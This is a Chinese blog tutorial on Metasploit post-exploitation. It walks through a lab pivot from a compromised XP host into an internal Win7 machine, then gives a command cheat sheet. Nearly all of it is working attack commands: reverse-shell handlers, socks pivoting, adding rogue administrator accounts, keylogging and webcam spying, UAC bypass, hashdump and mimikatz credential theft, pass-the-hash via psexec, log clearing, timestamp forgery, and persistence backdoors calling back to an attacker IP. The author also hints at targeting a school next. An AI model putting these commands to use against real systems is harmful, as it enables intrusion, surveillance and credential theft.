前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >msfconsole是什么意思_msfconsole渗透手机

msfconsole是什么意思_msfconsole渗透手机

作者头像
全栈程序员站长
发布于 2022-10-29 03:42:52
发布于 2022-10-29 03:42:52
59000
代码可运行
举报
运行总次数:0
代码可运行

大家好,又见面了,我是你们的朋友全栈君。

先模拟多层内网,摸清后渗透的使用,再从学校入手。 内网渗透test

网络拓扑

以kali为攻击机,xp作为跳板主机,win7是内网主机

xp主机是提供web,FTP等服务,已被kali机获取shell

win7正常不与外网访问,和DMZ区域处于同一网段

环境搭建

使用VMware的主机模式,构建虚拟局域网。查看Host-only模式详解

虚拟网络编译器中添加两块网卡vm1,vm2。 类型:主机模式

设置xp为双网卡vm1,vm2。其余按网络拓扑分配网卡

查看ip

kali

xp

win7

至此环境布置完毕

拿下跳板以及端口转发

以社工等方法获取到xp主机的shell 通过metasploit会话,使用Windows xp靶机作为跳板,扫描和攻击内部网络主机

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#kali msf
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.252.128
lhost => 192.168.252.128
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.252.128:4444 
[*] Sending stage (180291 bytes) to 192.168.252.130
[*] Meterpreter session 1 opened (192.168.252.128:4444 -> 192.168.252.130:1814) at 2019-11-16 12:44:58 +0800

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1


Interface  2
============
Name         : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:dd:e6:94
MTU          : 1500
IPv4 Address : 192.168.85.129
IPv4 Netmask : 255.255.255.0


Interface  3
============
Name         : VMware Accelerated AMD PCNet Adapter - rface
Hardware MAC : 00:0c:29:dd:e6:9e
MTU          : 1500
IPv4 Address : 192.168.252.130
IPv4 Netmask : 255.255.255.0

可以看到xp是双网卡,发现另一内网段 192.168.85.0/24。

对该内网进行渗透

添加内网的路由

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
meterpreter > run autoroute -s 192.168.85.0/24    #添加目标网段路由规则,获取内部网络访问通道
meterpreter > route flush  #不用的时候,记得删掉就行

扫描内网主机

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.85.0/24 #arp扫描粗略的扫一眼目标内网的机器大概有多少

发现 192.168.85.128的主机

socks代理

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#利用sock4a模块对目标内网代理,只能负责tcp的流量,并不是socks代理进去以后就什么都能搞了
meterpreter > background
msf exploit(handler) > use auxiliary/server/socks4a 
msf auxiliary(socks4a) > set srvhost 127.0.0.1
msf auxiliary(socks4a) > set srvport 1111
msf auxiliary(socks4a) > run

在proxychians.conf中设置好代理,就可以对目标进行正常的内网渗透了

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
vi /etc/proxychains.conf
#在文件末尾添加socks4代理服务器

利用proxychains代理扫描并执行nmap操作

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
proxychains nmap -Pn -sT 192.168.85.0/24 -p1-100
  1. 发现存在80端口,google配置代理

查看

获取内网win7的shell

使用任意文件上传,获取路径

这里使用蚁剑连接

可以看到win7 开启了3389端口

这里开启并使用远程桌面

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 创建新的管理员账户(直接更改管理员密码 net user Administrator 123)
whoami
net user
net user wk 123 /add
net localgroup administrators wk /add   #wk加入管理员账户

# 使用远程桌面
portfwd add -l 2222 -p 3389 -r 127.0.0.1  #先将3389流量转发到代理服务器
rdesktop 127.0.0.1:2222     #kali自带rdesktop

我这里出现错误,下载的win 7的系统有问题,但是此时的用户是正常使用的。

到此时,接下来的操作大家都懂的!

常用命令总结

execute执行文件
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
execute #在目标机中执行文件
execute -H -i -f  cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
# -d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行
"-o hack.txt"是payload.exe的运行参数
migrate进程迁移
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
getpid    # 获取当前进程的pid
ps   # 查看当前活跃进程
migrate <pid值>    # 将Meterpreter会话移植到指定pid值进程中
kill <pid值>   # 杀死进程
clearev清除日志
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
clearev  # 清除windows中的应用程序日志、系统日志、安全日志
timestomp伪造时间戳
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
timestomp C:\\ -h   #查看帮助
timestomp -v C:\.txt   #查看时间戳
timestomp C:\.txt -f C:\.txt #将1.txt的时间戳复制给2.txt
timestomp  c:\\test\.txt -z "03/10/2019 11:55:55" -v # 把四个属性设置为统一时间
portfwd端口转发
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
portfwd add -l 1111 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地1111端口
rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码
autoroute添加路由
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
run autoroute -h # 查看帮助
run get_local_subnets # 查看目标内网网段地址
run autoroute -s 192.168.183.0/24  # 添加目标网段路由
run autoroute -p  # 查看添加的路由
利用arp_scanner、portscan等进行扫描
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
run post/windows/gather/arp_scanner RHOSTS=192.168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.183.146 PORTS=3389
Socks代理
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
use auxiliary/server/socks4a
set srvhost 127.0.0.1
set srvport 2000
run
# 然后vim /etc/proxychains.conf ,在文件末尾添加socks4代理服务器
socks4 127.0.0.1 2000
proxychains nmap -Pn -sT 192.168.80.129 -p1-1000   #proxychains代理访问执行nmap操作
键盘记录
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
keyscan_start  # 开始键盘记录
keyscan_dump   # 导出记录数据
keyscan_stop   # 结束键盘记录
网络摄像头
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
record_mic  # 音频录制
webcam_chat  # 开启视频聊天(对方有弹窗)
webcam_list  # 查看摄像头
webcam_snap  # 通过摄像头拍照
webcam_stream  # 通过摄像头开启视频监控(以网页形式进行监控≈直播)
截屏
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
screenshot  # 截屏
use espia  # 使用espia模块
screengrab  # 截屏
绕过UAC提权

msf内置一些bypassuac脚本,原理不同,使用方法类似,执行后返回一个新的会话,执行getsystem即可提权

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_injection_winsxs
exploit/windows/local/bypassuac_silentcleanup
exploit/windows/local/bypassuac_vbs

use exploit/windows/local/bypassuac
set session 1
run
getsystem
窃取hash及密码&哈希传递
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# 窃取hash及密码
hashdump
run post/windows/gather/smart_hashdump
得到的hash可以拿去https://cmd5.com/ 解密一下即是用户密码


#mimikatz
load mimikatz # 加载mimikatz模块
msv  # 获取用户和hash值 
kerberos  # 获取内存中的明文密码信息
wdigest  # 获取内存中的明文密码信息
mimikatz_command -f a:: # 需要以错误的模块来让正确的模块显示
mimikatz_command -f sekurlsa::searchPasswords # 获取用户密码
mimikatz_command -f samdump::hashes  # 执行用户hash

#哈希传递
#利用hashdump得到用户的hash后可利用psexec模块进行哈希传递攻击。
使用psexec的前提:SMB服务必须开启,也就是开启445端口;Admin$可以访问
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.183.147
set LPORT 443
set RHOST 192.168.183.154
set SMBUSER Administrator
set SMBPASS ccf**4ee:3db**678
set SMBDOMAIN  WORKGROUP   # 域用户需要设置SMBDOMAIN
run
RDP
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#getgui命令
#这里需要注意的是通过getgui命令,虽然可以成功添加用户,但是没有权限远程登录桌面,这里推荐使用enable_rdp脚本添加。
run getgui –h  # 查看帮助
run getgui -e  # 开启远程桌面
run getgui -u admin -p admin  # 添加用户
run getgui -f 6666 -e  # 3389端口转发到6666


#enable_rdp脚本
#通过enable_rdp脚本将用户添加到远程桌面用户组和管理员用户组
run post/windows/manage/enable_rdp  #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=admin PASSWORD=admin # 添加用户
run post/windows/manage/enable_rdp FORWARD=true LPORT=6667  # 将3389端口转发到6667

#远程桌面
enumdesktops  # 查看可用的桌面
getdesktop    # 获取当前meterpreter 关联的桌面
setdesktop    # 设置meterpreter关联的桌面  -h查看帮助
run vnc   # 使用vnc远程桌面连接
rdesktop 127.0.0.1:1111 # 需要输入用户名密码连接
rdesktop -u Administrator -p 123 127.0.0.1:1111 # -u 用户名 -p 密码
后门植入
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# Persistence(通过启动项安装)
run persistence –h  # 查看帮助
run persistence -X -i 5 -p 4444 -r 192.168.183.147 
run persistence -U -i 5 -p 4444 -r 192.168.183.147 -L c:\\Windows\\System32
-X:设置后门在系统启动后自启动。该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限原因会导致添加失败,后门无法启动。因此在非管理员权限下,不推荐使用该参数
-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息
-L:后门传到远程主机的位置默认为%TEMP%
-i:设置反向连接间隔时间为5-p:设置反向连接的端口号
-r:设置反向连接的ip地址

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/196236.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月7日 下,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
如何解决错误:“ERROR: You have requested merging of multiple formats but ffmpeg is not installed. Aborting
在处理视频或音频格式转换时,使用工具如youtube-dl、yt-dlp等,遇到类似“ERROR: You have requested merging of multiple formats but ffmpeg is not installed. Aborting due to --abort-on-error”这样的错误提示是非常常见的。这个错误通常发生在尝试下载或合并不同格式的视频和音频时,且系统中缺少ffmpeg工具,导致下载过程无法继续。
猫头虎
2025/04/20
920
史上最强音视频下载神器youtube-dl回归,GitHub75k星
一个「身价」7.5万颗星的GitHub项目,从受热捧,到被起诉下架,再到引发社区热议。
量子位
2020/12/03
8210
史上最强音视频下载神器youtube-dl回归,GitHub75k星
不习惯在终端使用 youtube-dl?可以使用这些 GUI 应用
如果你一直在关注我们,可能已经知道 youtube-dl 项目曾被 GitHub 暂时下架 以合规。但它现在已经恢复并完全可以访问,可以说它并不是一个非法的工具。
用户1880875
2021/09/09
1.8K0
使用命令行下载youtube的视频和字幕
老高买使用搬瓦工有好久了,但是直到今天才想起来用命令行下载youtube的视频,实在是惭愧。赶紧加班写篇文章赎罪!
老高的技术博客
2022/12/28
1.9K0
使用命令行下载youtube的视频和字幕
使用 youtube-dl 下载网络视频
youtube-dl 是一个命令行程序,用于从 YouTube.com 和其他几个网站下载视频。它需要 Python 解释器,版本2.6,2.7或3.2+,它是跨平台程序。它可以运行在 Unix 、Windows 或 macOS 上。它是开源的,这意味着你可以修改它,重新分配或使用它。本文介绍如何使用它从视频网站如 YouTube、Youku、Bilibili 等视频站点下载并处理视频
SkyRiN
2018/11/20
8.3K2
用 yt-dlp 下载整个 YouTube 频道的视频
yt-dlp 是 youtube-dl 的一个分支,主要基于现在维护不太活跃的 youtube-dlc。该项目的主要重点是添加新功能和补丁,同时与原始项目保持同步。
生信菜鸟团
2022/02/17
7.4K0
用 yt-dlp 下载整个 YouTube 频道的视频
视频采集工具 youtube-dl 接口介绍
youtube-dl 是一个通过命令行下载视频的工具,其不仅支持 youtube 网站的视频下载,还支持上百个不同的视频网站。用户可以在官方网站上下载 Windows(exe) 和 Linux(tar.gz) 的版本,之后解压并使用对应的命令即可。 对于部分需要使用 youtube-dl 进行开发并且调用其接口为其他功能服务的用户而言,可以在 Github 上找到源码并且进行二次开发,也可以直接调用其 python 接口。关于如何在命令行直接使用打包好的 youtube-dl 工具有许多的文档进行介绍,这篇文章主要是对 youtube-dl 提供的一些接口参数及其功能进行说明,如有错误或不严谨的地方欢迎批评指正。
siri
2022/11/18
2.3K0
GitHub 标星 119K+!这些神器仅需一行代码即可下载全网视频!
来源 | 杰哥的IT之旅(ID:Jake_Internet) 转载请联系授权(微信ID:Hc220066)
杰哥的IT之旅
2020/10/23
2.1K0
GitHub 标星 119K+!这些神器仅需一行代码即可下载全网视频!
正确下载youtube视频的方式
youtube这个不存在的网站上有很多有用的资料,一般来说我们是可以下载所有视频到本地以供离线的情况下的研究学习,网上有很多工具提供了下载功能,但是在试用了很多标称很好用的软件后,老高发现,真的没有一个能和youtube-dl相提并论,所以老高还是记录一下如何使用正确使用youtube-dl!
老高的技术博客
2022/12/28
1.4K0
标星7.2万热门开源项目youtube-dl遭下架,开发者的权益谁来保护?
开源项目 youtube-dl 是一个使用 Python 编写的脚本,可以下载热门视频网站的音视频,并转换视频格式和清晰度。它是 GitHub 上的热门项目,获得 7.2 万多星。
AI算法与图像处理
2020/11/06
1.4K1
FFmpeg最全教程
​ FFmpeg的名称来自MPEG视频编码标准,前面的“FF”代表“Fast Forward”,FFmpeg是一套可以用来记录、转换数字音频、视频,并能将其转化为流的开源计算机程序。可以轻易地实现多种视频格式之间的相互转换。包括如下几个部分:
AI拉呱
2021/01/14
31.5K0
介绍一个能从YouTube和其他视频网站下载视频的强大工具——yt-dlp
今天我想和大家分享一个非常实用的命令行程序——yt-dlp。这个小工具可以帮助我们从 YouTube.com 和其他视频网站下载视频。它其实是 youtube-dl 项目的一个分支,由于原项目在 2020 年因版权问题而暂停更新,一些开发者和用户决定创建 yt-dlp 来继续提供类似的功能。
TechHarmony
2024/04/19
2.9K0
GitHub 标星 119K+!这些神器仅需一行代码即可下载全网视频!
今天这篇文章的内容对于经常浏览各大视频网站的同学来说,是一大神器工具。当你看到自己目前所需的视频时想尽各种办法保存至本地,方便后期再次回看。恰巧有些视频可能需要会员才能够下载,有些第三方的视频下载器可能在下载过程中比较缓慢。
崔庆才
2020/10/30
6.6K0
GitHub 标星 119K+!这些神器仅需一行代码即可下载全网视频!
网易云音乐歌单下载器
本项目不支持越权使用, VIP 歌曲请开通 VIP 后结合 --cookie 使用。详见 #54
井九
2024/10/12
2830
网易云音乐歌单下载器
ChatGPT批量下载YouTube视频为mp3音频
获取用户输入的YouTube视频地址(用户一次可能输入一个URL,也可能一次输入多个,确保能自动识别出多个不同的http地址);
AIGC部落
2024/10/21
2620
ChatGPT批量下载YouTube视频为mp3音频
轻松获取在线媒体:视频下载工具推荐
这些开源项目为用户提供了便捷的方式来下载在线媒体内容。无论是从流行视频网站如YouTube、优酷、BiliBili 等下载视频和音频,还是从网页中获取感兴趣的图片,这些项目都能满足你的需求。
小柒
2023/08/10
6590
轻松获取在线媒体:视频下载工具推荐
使用FFmpeg进行HLS打包——FFmpeg简单学
 点击上方“LiveVideoStack”关注我们 翻译、编辑:Alex 技术审校:赵军 本文来自OTTVerse,作者为Krishna Rao Vijayanagar。 ▲扫描图中二维码或点击阅读原文▲ 了解音视频技术大会更多信息 FFmpeg Easy-Tech #023# 在本文中,我们将学习使用FFmpeg进行HLS打包。使用FFmpeg的好处在于:你可以在不离开命令行的情况下,执行提取视频、调整视频尺寸、转码、打包以及传输视频的所有操作。 我们首先看一下为VOD(点播)创建HLS打包的所
LiveVideoStack
2022/05/09
2.5K0
使用FFmpeg进行HLS打包——FFmpeg简单学
“治不了GitHub,还治不了你?”唱片行业追杀youtube-dl
晓查 发自 凹非寺 量子位 | 公众号 QbitAI YouTube视频下载神器youtube-dl还在被追杀。 这款在GitHub上累计收获100k+ Star的开源工具,2020年末遭到了美国唱片协会(RIAA)的投诉而一度下架。 最近,索尼、华纳、环球三大唱片巨头,又在德国起诉一家名为Uberspace的小型网页托管服务商。 Uberspace不提供任何youtube-dl源代码,只是托管其官方网站,并提供链接到GitHub。 当初GitHub顶住压力让youtube-dl重新上架,既然动不了Git
量子位
2022/03/08
4590
一款跨平台的快速,简单,干净的视频下载器:Annie,支持Bilibili/Youtube等多个网站
说明:最近发现了个很强的下载神器Annie,一款用Go构建的快速,简单,干净的视频下载器,支持的平台很多,包括MacOS、Windows、Linux等,安装和使用是非常简单的,很适合新手,支持的网站也多,目前支持以下网站:
子润先生
2021/05/29
4.3K0
「简单实战」YouTube Iframe API 的使用
业务需求需要在自己的网页上嵌入油管( youtube )上的视频,所以去踩了油管 IFrame Player API 的坑。其实和大多数国内视频网站的 ifram Embed 方式是相似,比如说爱奇艺、腾讯视频、优酷等。在这些视频网站上你会发现都有分享功能,其中有一项就是通用代码。油管提供的 IFrame Player API 也是类似的方案。
拾贰
2019/08/28
4.6K0
「简单实战」YouTube Iframe API 的使用
推荐阅读
相关推荐
如何解决错误:“ERROR: You have requested merging of multiple formats but ffmpeg is not installed. Aborting
更多 >
LV.1
这个人很懒,什么都没有留下~
目录
  • 网络拓扑
  • 环境搭建
  • 拿下跳板以及端口转发
  • 获取内网win7的shell
  • 常用命令总结
    • execute执行文件
    • migrate进程迁移
    • clearev清除日志
    • timestomp伪造时间戳
    • portfwd端口转发
    • autoroute添加路由
    • 利用arp_scanner、portscan等进行扫描
    • Socks代理
    • 键盘记录
    • 网络摄像头
    • 截屏
    • 绕过UAC提权
    • 窃取hash及密码&哈希传递
    • RDP
    • 后门植入
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档